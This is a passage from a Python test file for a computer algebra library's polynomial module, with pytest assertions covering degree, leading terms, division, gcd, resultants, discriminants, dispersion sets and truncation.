assert degree(x*(x + 1) - x**2 - x, x) == -oo
@pytest.mark.timeout(30)
def test_sympyissue_6322():
assert degree((1 + x)**10000) == 10000
def test_Poly_degree_list():
assert [Integer(0).as_poly(x, y).degree(_) for _ in (x, y)] == [-math.inf]*2
assert [Integer(0).as_poly(x, y, z).degree(_) for _ in (x, y, z)] == [-math.inf]*3
assert [Integer(1).as_poly(x, y).degree(_) for _ in (x, y)] == [0, 0]
assert [Integer(1).as_poly(x, y, z).degree(_) for _ in (x, y, z)] == [0, 0, 0]
assert [(x**2*y + x**3*z**2 + 1).as_poly().degree(_)
for _ in (x, y, z)] == [3, 1, 2]
assert [degree(x*y**2, _) for _ in (x, y)] == [1, 2]
assert [degree(x**2 + y*x + 1, _) for _ in (x, y)] == [2, 1]
def test_Poly_total_degree():
assert (x**2*y + x**3*z**2 + 1).as_poly().total_degree() == 5
assert (x**2 + z**3).as_poly().total_degree() == 3
assert (x*y*z + z**4).as_poly().total_degree() == 4
assert (x**3 + x + 1).as_poly().total_degree() == 3
def test_Poly_LC():
assert Integer(0).as_poly(x).LC() == 0
assert Integer(1).as_poly(x).LC() == 1
assert (2*x**2 + x).as_poly().LC() == 2
assert (x*y**7 + 2*x**2*y**3).as_poly().LC('lex') == 2
assert (x*y**7 + 2*x**2*y**3).as_poly().LC('grlex') == 1
assert LC(x*y**7 + 2*x**2*y**3, order='lex') == 2
assert LC(x*y**7 + 2*x**2*y**3, order='grlex') == 1
pytest.raises(ComputationFailed, lambda: LC([1, 2]))
def test_Poly_TC():
assert Integer(0).as_poly(x).TC() == 0
assert Integer(1).as_poly(x).TC() == 1
assert (2*x**2 + x).as_poly().TC() == 0
def test_Poly_EC():
assert Integer(0).as_poly(x).EC() == 0
assert Integer(1).as_poly(x).EC() == 1
assert (2*x**2 + x).as_poly().EC() == 1
assert (x*y**7 + 2*x**2*y**3).as_poly().EC('lex') == 1
assert (x*y**7 + 2*x**2*y**3).as_poly().EC('grlex') == 2
def test_Poly_coeff():
f = Integer(0).as_poly(x)
assert f.coeff_monomial(1) == 0
assert f.coeff_monomial(x) == 0
assert f.coeff_monomial((0,)) == 0
assert f.coeff_monomial((1,)) == 0
f = Integer(1).as_poly(x)
assert f.coeff_monomial(1) == 1
assert f.coeff_monomial(x) == 0
assert f.coeff_monomial((0,)) == 1
assert f.coeff_monomial((1,)) == 0
f = (x**8).as_poly()
assert f.coeff_monomial(1) == 0
assert f.coeff_monomial(x**7) == 0
assert f.coeff_monomial(x**8) == 1
assert f.coeff_monomial(x**9) == 0
assert f.coeff_monomial((0,)) == 0
assert f.coeff_monomial((7,)) == 0
assert f.coeff_monomial((8,)) == 1
assert f.coeff_monomial((9,)) == 0
f = (3*x*y**2 + 1).as_poly()
assert f.coeff_monomial(1) == 1
assert f.coeff_monomial(x*y**2) == 3
assert f.coeff_monomial((0, 0)) == 1
assert f.coeff_monomial((1, 2)) == 3
p = (24*x*y*exp(8) + 23*x).as_poly(x, y)
assert p.coeff_monomial(x) == 23
assert p.coeff_monomial(y) == 0
assert p.coeff_monomial(x*y) == 24*exp(8)
assert p.as_expr().coeff(x) == 24*y*exp(8) + 23
pytest.raises(NotImplementedError, lambda: p.coeff(x))
f = (x + 1).as_poly()
pytest.raises(ValueError, lambda: f.coeff_monomial(0))
pytest.raises(ValueError, lambda: f.coeff_monomial(3*x))
pytest.raises(ValueError, lambda: f.coeff_monomial(3*x*y))
pytest.raises(ValueError, lambda: (x*y + 1).as_poly().coeff_monomial((1,)))
assert (x**3 + 2*x**2 + 3*x).as_poly().coeff_monomial((2,)) == 2
assert (x**3 + 2*x*y**2 + y**2).as_poly().coeff_monomial((1, 2)) == 2
assert (4*sqrt(x)*y).as_poly().coeff_monomial((1, 1)) == 4
def test_Poly_LM():
assert Integer(0).as_poly(x).LM() == (0,)
assert Integer(1).as_poly(x).LM() == (0,)
assert (2*x**2 + x).as_poly().LM() == (2,)
assert (x*y**7 + 2*x**2*y**3).as_poly().LM('lex') == (2, 3)
assert (x*y**7 + 2*x**2*y**3).as_poly().LM('grlex') == (1, 7)
assert LM(x*y**7 + 2*x**2*y**3, order='lex') == x**2*y**3
assert LM(x*y**7 + 2*x**2*y**3, order='grlex') == x*y**7
pytest.raises(ComputationFailed, lambda: LM([1, 2]))
def test_Poly_LM_custom_order():
f = (x**2*y**3*z + x**2*y*z**3 + x*y*z + 1).as_poly()
def rev_lex(monom):
return tuple(reversed(monom))
assert f.LM(order='lex') == (2, 3, 1)
assert f.LM(order=rev_lex) == (2, 1, 3)
def test_Poly_EM():
assert Integer(0).as_poly(x).EM() == (0,)
assert Integer(1).as_poly(x).EM() == (0,)
assert (2*x**2 + x).as_poly().EM() == (1,)
assert (x*y**7 + 2*x**2*y**3).as_poly().EM('lex') == (1, 7)
assert (x*y**7 + 2*x**2*y**3).as_poly().EM('grlex') == (2, 3)
def test_Poly_LT():
assert Integer(0).as_poly(x).LT() == ((0,), 0)
assert Integer(1).as_poly(x).LT() == ((0,), 1)
assert (2*x**2 + x).as_poly().LT() == ((2,), 2)
assert (x*y**7 + 2*x**2*y**3).as_poly().LT('lex') == ((2, 3), 2)
assert (x*y**7 + 2*x**2*y**3).as_poly().LT('grlex') == ((1, 7), 1)
assert LT(x*y**7 + 2*x**2*y**3, order='lex') == 2*x**2*y**3
assert LT(x*y**7 + 2*x**2*y**3, order='grlex') == x*y**7
pytest.raises(ComputationFailed, lambda: LT([1, 2]))
def test_Poly_ET():
assert Integer(0).as_poly(x).ET() == ((0,), 0)
assert Integer(1).as_poly(x).ET() == ((0,), 1)
assert (2*x**2 + x).as_poly().ET() == ((1,), 1)
assert (x*y**7 + 2*x**2*y**3).as_poly().ET('lex') == ((1, 7), 1)
assert (x*y**7 + 2*x**2*y**3).as_poly().ET('grlex') == ((2, 3), 2)
def test_Poly_clear_denoms():
coeff, poly = (x + 2).as_poly().clear_denoms()
assert coeff == 1 and poly == (x + 2).as_poly(domain=ZZ) and poly.domain == ZZ
coeff, poly = (x/2 + 1).as_poly().clear_denoms()
assert coeff == 2 and poly == (x + 2).as_poly(domain=QQ) and poly.domain == QQ
coeff, poly = (x/2 + 1).as_poly().clear_denoms(convert=True)
assert coeff == 2 and poly == (x + 2).as_poly(domain=ZZ) and poly.domain == ZZ
coeff, poly = (x/y + 1).as_poly(x).clear_denoms(convert=True)
assert coeff == y and poly == (x + y).as_poly(x, domain=ZZ.inject(y)) and poly.domain == ZZ.inject(y)
coeff, poly = (x/3 + sqrt(2)).as_poly(x, domain=EX).clear_denoms()
assert coeff == 3 and poly == (x + 3*sqrt(2)).as_poly(x, domain=EX) and poly.domain == EX
coeff, poly = (x/3 + sqrt(2)).as_poly(x, domain=EX).clear_denoms(convert=True)
assert coeff == 3 and poly == (x + 3*sqrt(2)).as_poly(x, domain=EX) and poly.domain == EX
def test_Poly_rat_clear_denoms():
f = (x**2/y + 1).as_poly(x)
g = (x**3 + y).as_poly(x)
assert f.rat_clear_denoms(g) == \
((x**2 + y).as_poly(x), (y*x**3 + y**2).as_poly(x))
f = f.set_domain(EX)
g = g.set_domain(EX)
assert f.rat_clear_denoms(g) == (f, g)
def test_Poly_integrate():
f = (x + 1).as_poly()
assert f.integrate() == (x**2/2 + x).as_poly()
assert f.integrate(x) == (x**2/2 + x).as_poly()
assert f.integrate((x, 1)) == (x**2/2 + x).as_poly()
assert (2*x + 1).as_poly().integrate(auto=False) == (x**2 + x).as_poly()
f = (x*y + 1).as_poly()
assert f.integrate(x) == (x**2*y/2 + x).as_poly()
assert f.integrate(y) == (x*y**2/2 + y).as_poly()
assert f.integrate(x, x) == (x**3*y/6 + x**2/2).as_poly()
assert f.integrate(y, y) == (x*y**3/6 + y**2/2).as_poly()
assert f.integrate((x, 2)) == (x**3*y/6 + x**2/2).as_poly()
assert f.integrate((y, 2)) == (x*y**3/6 + y**2/2).as_poly()
assert f.integrate(x, y) == (x**2*y**2/4 + x*y).as_poly()
assert f.integrate(y, x) == (x**2*y**2/4 + x*y).as_poly()
def test_Poly_diff():
f = (x**2 + x).as_poly()
assert f.diff() == (2*x + 1).as_poly()
assert f.diff(x) == (2*x + 1).as_poly()
assert f.diff((x, 1)) == (2*x + 1).as_poly()
# issue sympy/sympy#9585
assert diff(f) == (2*x + 1).as_poly()
assert diff(f, x, evaluate=False) == Derivative(f, x)
assert Derivative(f, x).doit() == (2*x + 1).as_poly()
assert f.diff(x, evaluate=False) == Derivative(f, x)
f = (x**2 + 2*x + 1).as_poly()
assert f.diff() == (2*x + 2).as_poly()
f = (x**2*y**2 + x*y).as_poly()
assert f.diff(x) == (2*x*y**2 + y).as_poly()
assert f.diff(y) == (2*x**2*y + x).as_poly()
assert f.diff(x, x) == (2*y**2).as_poly(x, y)
assert f.diff(y, y) == (2*x**2).as_poly(x, y)
assert f.diff((x, 2)) == (2*y**2).as_poly(x, y)
assert f.diff((y, 2)) == (2*x**2).as_poly(x, y)
assert f.diff(x, y) == (4*x*y + 1).as_poly()
assert f.diff(y, x) == (4*x*y + 1).as_poly()
f = (x*y**2 + x).as_poly()
assert f.diff((x, 0), (y, 1)) == (2*x*y).as_poly()
def test_Poly_eval():
f = Integer(0).as_poly(x)
assert f.eval(7) == 0
assert f.eval(0, 7) == 0
assert f.eval(x, 7) == 0
assert f.eval('x', 7) == 0
f = Integer(1).as_poly(x)
assert f.eval(7) == 1
assert f.eval(0, 7) == 1
assert f.eval(x, 7) == 1
assert f.eval('x', 7) == 1
pytest.raises(PolynomialError, lambda: f.eval(1, 7))
pytest.raises(PolynomialError, lambda: f.eval(y, 7))
pytest.raises(PolynomialError, lambda: f.eval('y', 7))
f = x.as_poly()
assert f.eval(7) == 7
assert f.eval(0, 7) == 7
assert f.eval(x, 7) == 7
assert f.eval('x', 7) == 7
f = Integer(123).as_poly(x, y)
assert f.eval(7) == Integer(123).as_poly(y)
assert f.eval(x, 7) == Integer(123).as_poly(y)
assert f.eval(y, 7) == Integer(123).as_poly(x)
f = (2*y).as_poly(x, y)
assert f.eval(7) == (2*y).as_poly()
assert f.eval(x, 7) == (2*y).as_poly()
assert f.eval(y, 7) == Integer(14).as_poly(x)
f = (x*y).as_poly()
assert f.eval(7) == (7*y).as_poly()
assert f.eval(x, 7) == (7*y).as_poly()
assert f.eval(y, 7) == (7*x).as_poly()
f = (x*y + y).as_poly()
assert f.eval({x: 7}) == (8*y).as_poly()
assert f.eval({y: 7}) == (7*x + 7).as_poly()
assert f.eval({x: 6, y: 7}) == 49
assert f.eval({x: 7, y: 6}) == 48
assert f.eval((6, 7)) == 49
assert f.eval([6, 7]) == 49
pytest.raises(ValueError, lambda: f.eval((6, 7, 8)))
f = (x + 1).as_poly()
assert f.eval(Rational(1, 2)) == Rational(3, 2)
assert f.eval(sqrt(2)) == sqrt(2) + 1
pytest.raises(DomainError, lambda: f.eval(Rational(1, 2), auto=False))
# issue sympy/sympy#6344
alpha = Symbol('alpha')
result = (2*alpha*z - 2*alpha + z**2 + 3)/(z**2 - 2*z + 1)
f = (x**2 + (alpha - 1)*x - alpha + 1).as_poly(x, domain=ZZ.inject(alpha))
assert f.eval((z + 1)/(z - 1)) == result
f = (x**2 + (alpha - 1)*x - alpha + 1).as_poly(x, y, domain=ZZ.inject(alpha))
assert f.eval((z + 1)/(z - 1)) == result.as_poly(y, domain=ZZ.inject(alpha, z).field)
def test_Poly___call__():
f = (2*x*y + 3*x + y + 2*z).as_poly()
assert f(2) == (5*y + 2*z + 6).as_poly()
assert f(2, 5) == (2*z + 31).as_poly()
assert f(2, 5, 7) == 45
def test_parallel_poly_from_expr():
pytest.raises(PolificationFailed, lambda: parallel_poly_from_expr([]))
pytest.raises(PolificationFailed, lambda: parallel_poly_from_expr([[1, 2]]))
assert parallel_poly_from_expr(
[x - 1, x**2 - 1], x)[0] == [(x - 1).as_poly(), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr(
[(x - 1).as_poly(), x**2 - 1], x)[0] == [(x - 1).as_poly(), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr(
[x - 1, (x**2 - 1).as_poly()], x)[0] == [(x - 1).as_poly(), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr([(
x - 1).as_poly(), (x**2 - 1).as_poly()], x)[0] == [(x - 1).as_poly(), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr(
[x - 1, x**2 - 1], x, y)[0] == [(x - 1).as_poly(x, y), (x**2 - 1).as_poly(x, y)]
assert parallel_poly_from_expr([(
x - 1).as_poly(), x**2 - 1], x, y)[0] == [(x - 1).as_poly(x, y), (x**2 - 1).as_poly(x, y)]
assert parallel_poly_from_expr([x - 1, (
x**2 - 1).as_poly()], x, y)[0] == [(x - 1).as_poly(x, y), (x**2 - 1).as_poly(x, y)]
assert parallel_poly_from_expr([(x - 1).as_poly(), (
x**2 - 1).as_poly()], x, y)[0] == [(x - 1).as_poly(x, y), (x**2 - 1).as_poly(x, y)]
assert parallel_poly_from_expr(
[x - 1, x**2 - 1])[0] == [(x - 1).as_poly(), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr(
[(x - 1).as_poly(), x**2 - 1])[0] == [(x - 1).as_poly(), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr(
[x - 1, (x**2 - 1).as_poly()])[0] == [(x - 1).as_poly(), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr(
[(x - 1).as_poly(), (x**2 - 1).as_poly()])[0] == [(x - 1).as_poly(), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr(
[1, x**2 - 1])[0] == [Integer(1).as_poly(x), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr(
[1, x**2 - 1])[0] == [Integer(1).as_poly(x), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr(
[1, (x**2 - 1).as_poly()])[0] == [Integer(1).as_poly(x), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr(
[1, (x**2 - 1).as_poly()])[0] == [Integer(1).as_poly(x), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr(
[x**2 - 1, 1])[0] == [(x**2 - 1).as_poly(), Integer(1).as_poly(x)]
assert parallel_poly_from_expr(
[x**2 - 1, 1])[0] == [(x**2 - 1).as_poly(), Integer(1).as_poly(x)]
assert parallel_poly_from_expr(
[(x**2 - 1).as_poly(), 1])[0] == [(x**2 - 1).as_poly(), Integer(1).as_poly(x)]
assert parallel_poly_from_expr(
[(x**2 - 1).as_poly(), 1])[0] == [(x**2 - 1).as_poly(), Integer(1).as_poly(x)]
assert parallel_poly_from_expr([x.as_poly(x, y), y.as_poly(x, y)], x, y, order='lex')[0] == \
[x.as_poly(x, y, domain=ZZ), y.as_poly(x, y, domain=ZZ)]
pytest.raises(PolificationFailed, lambda: parallel_poly_from_expr([0, 1]))
assert (parallel_poly_from_expr([(x - 1)**2, 1], expand=False) ==
([((x - 1)**2).as_poly(x - 1, expand=False), Integer(1).as_poly(x - 1)],
{'domain': ZZ, 'expand': False, 'gens': (x - 1,),
'polys': False}))
def test_div():
f, g = x**2 - y**2, x - y
q, r = x + y, Integer(0)
F, G, Q, R = [h.as_poly(x, y) for h in (f, g, q, r)]
assert F.div(G) == (Q, R)
assert F.rem(G) == R
assert F.quo(G) == Q
assert F.exquo(G) == Q
assert div(f, g) == (q, r)
assert rem(f, g) == r
assert quo(f, g) == q
assert exquo(f, g) == q
assert div(f, g, x, y) == (q, r)
assert rem(f, g, x, y) == r
assert quo(f, g, x, y) == q
assert exquo(f, g, x, y) == q
assert div(F, G) == (Q, R)
assert rem(F, G) == R
assert quo(F, G) == Q
assert exquo(F, G) == Q
assert div(f, g, polys=True) == (Q, R)
assert rem(f, g, polys=True) == R
assert quo(f, g, polys=True) == Q
assert exquo(f, g, polys=True) == Q
assert div(F, G, polys=False) == (q, r)
assert rem(F, G, polys=False) == r
assert quo(F, G, polys=False) == q
assert exquo(F, G, polys=False) == q
pytest.raises(ComputationFailed, lambda: div(4, 2))
pytest.raises(ComputationFailed, lambda: rem(4, 2))
pytest.raises(ComputationFailed, lambda: quo(4, 2))
pytest.raises(ComputationFailed, lambda: exquo(4, 2))
f, g = x**2 + 1, 2*x - 4
qz, rz = 0, x**2 + 1
qq, rq = x/2 + 1, 5
assert div(f, g) == (qq, rq)
assert div(f, g, auto=True) == (qq, rq)
assert div(f, g, auto=False) == (qz, rz)
assert div(f, g, domain=ZZ) == (qz, rz)
assert div(f, g, domain=QQ) == (qq, rq)
assert div(f, g, domain=ZZ, auto=True) == (qq, rq)
assert div(f, g, domain=ZZ, auto=False) == (qz, rz)
assert div(f, g, domain=QQ, auto=True) == (qq, rq)
assert div(f, g, domain=QQ, auto=False) == (qq, rq)
assert rem(f, g) == rq
assert rem(f, g, auto=True) == rq
assert rem(f, g, auto=False) == rz
assert rem(f, g, domain=ZZ) == rz
assert rem(f, g, domain=QQ) == rq
assert rem(f, g, domain=ZZ, auto=True) == rq
assert rem(f, g, domain=ZZ, auto=False) == rz
assert rem(f, g, domain=QQ, auto=True) == rq
assert rem(f, g, domain=QQ, auto=False) == rq
assert quo(f, g) == qq
assert quo(f, g, auto=True) == qq
assert quo(f, g, auto=False) == qz
assert quo(f, g, domain=ZZ) == qz
assert quo(f, g, domain=QQ) == qq
assert quo(f, g, domain=ZZ, auto=True) == qq
assert quo(f, g, domain=ZZ, auto=False) == qz
assert quo(f, g, domain=QQ, auto=True) == qq
assert quo(f, g, domain=QQ, auto=False) == qq
f, g, q = x**2, 2*x, x/2
assert exquo(f, g) == q
assert exquo(f, g, auto=True) == q
pytest.raises(ExactQuotientFailed, lambda: exquo(f, g, auto=False))
pytest.raises(ExactQuotientFailed, lambda: exquo(f, g, domain=ZZ))
assert exquo(f, g, domain=QQ) == q
assert exquo(f, g, domain=ZZ, auto=True) == q
pytest.raises(ExactQuotientFailed, lambda: exquo(f, g, domain=ZZ, auto=False))
assert exquo(f, g, domain=QQ, auto=True) == q
assert exquo(f, g, domain=QQ, auto=False) == q
f, g = (x**2).as_poly(), x.as_poly()
q, r = f.div(g)
assert q.domain.is_IntegerRing and r.domain.is_IntegerRing
r = f.rem(g)
assert r.domain.is_IntegerRing
q = f.quo(g)
assert q.domain.is_IntegerRing
q = f.exquo(g)
assert q.domain.is_IntegerRing
f, g, q = x**2 + 1, 2*x - 9, QQ(85, 4)
assert rem(f, g) == q
f, g = a*x**2 + b*x + c, 3*x + 2
assert div(f, g) == (a*x/3 - 2*a/9 + b/3, 4*a/9 - 2*b/3 + c)
f, g = (x + y).as_poly(x), (2*x + y).as_poly(x)
q, r = f.div(g)
assert q.domain.is_FractionField and r.domain.is_FractionField
def test_gcdex():
f, g = 2*x, x**2 - 16
s, t, h = x/32, -Rational(1, 16), Integer(1)
F, G, S, T, H = [u.as_poly(x, domain=QQ) for u in (f, g, s, t, h)]
assert F.half_gcdex(G) == (S, H)
assert F.gcdex(G) == (S, T, H)
assert F.invert(G) == S
assert half_gcdex(f, g) == (s, h)
assert gcdex(f, g) == (s, t, h)
assert invert(f, g) == s
assert half_gcdex(f, g, x) == (s, h)
assert gcdex(f, g, x) == (s, t, h)
assert invert(f, g, x) == s
assert half_gcdex(F, G) == (S, H)
assert gcdex(F, G) == (S, T, H)
assert invert(F, G) == S
assert half_gcdex(f, g, polys=True) == (S, H)
assert gcdex(f, g, polys=True) == (S, T, H)
assert invert(f, g, polys=True) == S
assert half_gcdex(F, G, polys=False) == (s, h)
assert gcdex(F, G, polys=False) == (s, t, h)
assert invert(F, G, polys=False) == s
assert half_gcdex(100, 2004) == (-20, 4)
assert gcdex(100, 2004) == (-20, 1, 4)
assert invert(3, 7) == 5
pytest.raises(DomainError, lambda: half_gcdex(x + 1, 2*x + 1, auto=False))
pytest.raises(DomainError, lambda: gcdex(x + 1, 2*x + 1, auto=False))
pytest.raises(DomainError, lambda: invert(x + 1, 2*x + 1, auto=False))
def test_subresultants():
f, g, h = x**2 - 2*x + 1, x**2 - 1, 2*x - 2
F, G, H = f.as_poly(), g.as_poly(), h.as_poly()
assert F.subresultants(G) == [F, G, H]
assert subresultants(f, g) == [f, g, h]
assert subresultants(f, g, x) == [f, g, h]
assert subresultants(F, G) == [F, G, H]
assert subresultants(f, g, polys=True) == [F, G, H]
assert subresultants(F, G, polys=False) == [f, g, h]
pytest.raises(ComputationFailed, lambda: subresultants(4, 2))
def test_resultant():
f, g, h = x**2 - 2*x + 1, x**2 - 1, Integer(0)
F, G = f.as_poly(), g.as_poly()
assert F.resultant(G) == h
assert PurePoly(f).resultant(PurePoly(g)) == h
assert resultant(f, g) == h
assert resultant(f, g, x) == h
assert resultant(F, G) == h
assert resultant(f, g, polys=True) == h
assert resultant(F, G, polys=False) == h
assert resultant(f, g, includePRS=True) == (h, [f, g, 2*x - 2])
assert resultant(f, g, polys=True,
includePRS=True) == (0, [f, g, (2*x - 2).as_poly()])
f, g, h = x - a, x - b, a - b
F, G, H = f.as_poly(), g.as_poly(), h.as_poly()
assert F.resultant(G) == H
assert resultant(f, g) == h
assert resultant(f, g, x) == h
assert resultant(F, G) == H
assert resultant(f, g, polys=True) == H
assert resultant(F, G, polys=False) == h
pytest.raises(ComputationFailed, lambda: resultant(4, 2))
assert resultant(PurePoly(x**2 + y),
PurePoly(x*y - 1)) == PurePoly(y**3 + 1)
f = (x**4 - x**2 + 1).as_poly()
assert f.resultant((x**2 - y).as_poly()) == ((y**2 - y + 1)**2).as_poly()
assert f.resultant((x**3 - y).as_poly()) == ((y**2 + 1)**2).as_poly()
assert f.resultant((x**4 - y).as_poly()) == ((y**2 + y + 1)**2).as_poly()
assert f.resultant((x**12 - y).as_poly()) == ((y - 1)**4).as_poly()
def test_discriminant():
f, g = x**3 + 3*x**2 + 9*x - 13, -11664
F = f.as_poly()
assert F.discriminant() == g
assert discriminant(f) == g
assert discriminant(f, x) == g
assert discriminant(F) == g
assert discriminant(f, polys=True) == g
assert discriminant(F, polys=False) == g
f, g = a*x**2 + b*x + c, b**2 - 4*a*c
F, G = f.as_poly(), g.as_poly()
assert F.discriminant() == G
assert discriminant(f) == g
assert discriminant(f, x, a, b, c) == g
assert discriminant(F) == G
assert discriminant(f, polys=True) == G
assert discriminant(F, polys=False) == g
pytest.raises(ComputationFailed, lambda: discriminant(4))
def test_dispersion():
pytest.raises(AttributeError, lambda: (x*y).as_poly().dispersionset(x.as_poly()))
pytest.raises(ValueError, lambda: x.as_poly().dispersionset(y.as_poly()))
fp = Integer(0).as_poly(x)
assert fp.dispersionset() == {0}
fp = Integer(2).as_poly(x)
assert fp.dispersionset() == {0}
fp = (x + 1).as_poly()
assert fp.dispersionset() == {0}
fp = ((x + 1)*(x + 2)).as_poly()
assert fp.dispersionset() == {0, 1}
fp = (x**4 - 3*x**2 + 1).as_poly()
gp = fp.shift(-3)
assert fp.dispersionset(gp) == {2, 3, 4}
assert gp.dispersionset(fp) == set()
fp = (x*(x + 3)).as_poly()
assert fp.dispersionset() == {0, 3}
fp = ((x - 3)*(x + 3)).as_poly()
assert fp.dispersionset() == {0, 6}
fp = (x**2 + 2*x - 1).as_poly()
gp = (x**2 + 2*x + 3).as_poly()
assert fp.dispersionset(gp) == set()
fp = (x*(3*x**2 + a)*(x - 2536)*(x**3 + a)).as_poly(x)
gp = fp.as_expr().subs({x: x - 345}).as_poly(x)
assert fp.dispersionset(gp) == {345, 2881}
assert gp.dispersionset(fp) == {2191}
fp = ((x - 2)**2*(x - 3)**3*(x - 5)**3).as_poly()
gp = (fp + 4)**2
assert fp.dispersionset() == {0, 1, 2, 3}
assert fp.dispersionset(gp) == {1, 2}
fp = (x*(x + 2)*(x - 1)).as_poly()
assert fp.dispersionset() == {0, 1, 2, 3}
fp = (x**2 + sqrt(5)*x - 1).as_poly(x)
gp = (x**2 + (2 + sqrt(5))*x + sqrt(5)).as_poly(x)
assert fp.dispersionset(gp) == {2}
assert gp.dispersionset(fp) == {1, 4}
# There are some difficulties if we compute over Z[a]
# and alpha happenes to lie in Z[a] instead of simply Z.
# Hence we can not decide if alpha is indeed integral
# in general.
fp = (4*x**4 + (4*a + 8)*x**3 + (a**2 + 6*a + 4)*x**2 + (a**2 + 2*a)*x).as_poly(x)
assert fp.dispersionset() == {0, 1}
# For any specific value of a, the dispersion is 3*a
# but the algorithm can not find this in general.
# This is the point where the resultant based Ansatz
# is superior to the current one.
fp = (a**2*x**3 + (a**3 + a**2 + a + 1)*x).as_poly(x)
gp = fp.as_expr().subs({x: x - 3*a}).as_poly(x)
assert fp.dispersionset(gp) == set()
fpa = fp.as_expr().subs({a: 2}).as_poly(x)
gpa = gp.as_expr().subs({a: 2}).as_poly(x)
assert fpa.dispersionset(gpa) == {6}
def test_lcm():
F = [x**3 - 1, x**2 - 1, x**2 - 3*x + 2]
assert functools.reduce(lcm, F) == x**5 - x**4 - 2*x**3 - x**2 + x + 2
assert functools.reduce(lambda x, y: lcm(x, y, polys=True),
F) == (x**5 - x**4 - 2*x**3 - x**2 + x + 2).as_poly()
assert lcm(1, 2) == 2
assert functools.reduce(lcm, [4, 6, 8]) == 24
def test_gcd():
f, g = x**3 - 1, x**2 - 1
s, t = x**2 + x + 1, x + 1
h, r = x - 1, x**4 + x**3 - x - 1
F, G, S, T, H, R = [u.as_poly() for u in (f, g, s, t, h, r)]
assert F.cofactors(G) == (H, S, T)
assert F.gcd(G) == H
assert F.lcm(G) == R
assert cofactors(f, g) == (h, s, t)
assert gcd(f, g) == h
assert lcm(f, g) == r
assert cofactors(f, g, x) == (h, s, t)
assert gcd(f, g, x) == h
assert lcm(f, g, x) == r
assert cofactors(F, G) == (H, S, T)
assert gcd(F, G) == H
assert lcm(F, G) == R
assert cofactors(f, g, polys=True) == (H, S, T)
assert gcd(f, g, polys=True) == H
assert lcm(f, g, polys=True) == R
assert cofactors(F, G, polys=False) == (h, s, t)
assert gcd(F, G, polys=False) == h
assert lcm(F, G, polys=False) == r
f, g = 1.0*x**2 - 1.0, 1.0*x - 1.0
h, s, t = g, 1.0*x + 1.0, 1.0
assert cofactors(f, g) == (h, s, t)
assert gcd(f, g) == h
assert lcm(f, g) == f
f, g = 1.0*x**2 - 1.0, 1.0*x - 1.0
h, s, t = g, 1.0*x + 1.0, 1.0
assert cofactors(f, g) == (h, s, t)
assert gcd(f, g) == h
assert lcm(f, g) == f
assert cofactors(8, 6) == (2, 4, 3)
assert gcd(8, 6) == 2
assert lcm(8, 6) == 24
f, g = x**2 + 8*x + 7, x**3 + 7*x**2 + x + 7
l = x**4 + 8*x**3 + 8*x**2 + 8*x + 7
h, s, t = x + 7, x + 1, x**2 + 1
assert cofactors(f, g, modulus=11) == (h, s, t)
assert gcd(f, g, modulus=11) == h
assert lcm(f, g, modulus=11) == l
pytest.raises(TypeError, lambda: gcd(x))
pytest.raises(TypeError, lambda: lcm(x))
F = [x**3 - 1, x**2 - 1, x**2 - 3*x + 2]
assert functools.reduce(gcd, F) == x - 1
assert functools.reduce(lambda x, y: gcd(x, y, polys=True), F) == (x - 1).as_poly()
F = [x**3 - 1, x**2 - 2, x**2 - 3*x + 2]
assert functools.reduce(gcd, F) == 1
def test_gcd_numbers_vs_polys():
assert isinstance(gcd(3, 9), Integer)
assert isinstance(gcd(3*x, 9), Integer)
assert gcd(3, 9) == 3
assert gcd(3*x, 9) == 3
assert isinstance(gcd(Rational(3, 2), Rational(9, 4)), Rational)
assert isinstance(gcd(Rational(3, 2)*x, Rational(9, 4)), Rational)
assert gcd(Rational(3, 2), Rational(9, 4)) == Rational(3, 4)
assert gcd(Rational(3, 2)*x, Rational(9, 4)) == 1
assert isinstance(gcd(3.0, 9.0), Float)
assert isinstance(gcd(3.0*x, 9.0), Float)
assert gcd(3.0, 9.0) == 1.0
assert gcd(3.0*x, 9.0) == 1.0
def test_terms_gcd():
assert terms_gcd(1) == 1
assert terms_gcd(1, x) == 1
assert terms_gcd(x - 1) == x - 1
assert terms_gcd(-x - 1) == -x - 1
assert terms_gcd(2*x + 3) == 2*x + 3
assert terms_gcd(6*x + 4) == Mul(2, 3*x + 2, evaluate=False)
assert terms_gcd(x**3*y + x*y**3) == x*y*(x**2 + y**2)
assert terms_gcd(2*x**3*y + 2*x*y**3) == 2*x*y*(x**2 + y**2)
assert terms_gcd(x**3*y/2 + x*y**3/2) == x*y/2*(x**2 + y**2)
assert terms_gcd(x**3*y + 2*x*y**3) == x*y*(x**2 + 2*y**2)
assert terms_gcd(2*x**3*y + 4*x*y**3) == 2*x*y*(x**2 + 2*y**2)
assert terms_gcd(2*x**3*y/3 + 4*x*y**3/5) == 2*x*y/15*(5*x**2 + 6*y**2)
assert terms_gcd(2.0*x**3*y + 4.1*x*y**3) == x*y*(2.0*x**2 + 4.1*y**2)
assert terms_gcd(2.0*x + 3) == 2.0*x + 3
assert terms_gcd((3 + 3*x)*(x + x*y), expand=False) == \
(3*x + 3)*(x*y + x)
assert terms_gcd((3 + 3*x)*(x + x*sin(3 + 3*y)), expand=False, deep=True) == \
3*x*(x + 1)*(sin(Mul(3, y + 1, evaluate=False)) + 1)
assert terms_gcd(sin(x + x*y), deep=True) == \
sin(x*(y + 1))
eq = Eq(2*x, 2*y + 2*z*y)
assert terms_gcd(eq) == eq
assert terms_gcd(eq, deep=True) == Eq(2*x, 2*y*(z + 1))
def test_trunc():
f, g = x**5 + 2*x**4 + 3*x**3 + 4*x**2 + 5*x + 6, x**5 - x**4 + x**2 - x
F, G = f.as_poly(), g.as_poly()
assert F.trunc(3) == G
assert trunc(f, 3) == g
assert trunc(f, 3, x) == g
assert trunc(F, 3) == G
assert trunc(f, 3, polys=True) == G
assert trunc(F, 3, polys=False) == g
f, g = 6*x**5 + 5*x**4 + 4*x**3 + 3*x**2 + 2*x + 1, -x**4 + x**3 - x + 1
F, G = f.as_poly(), g.as_poly()
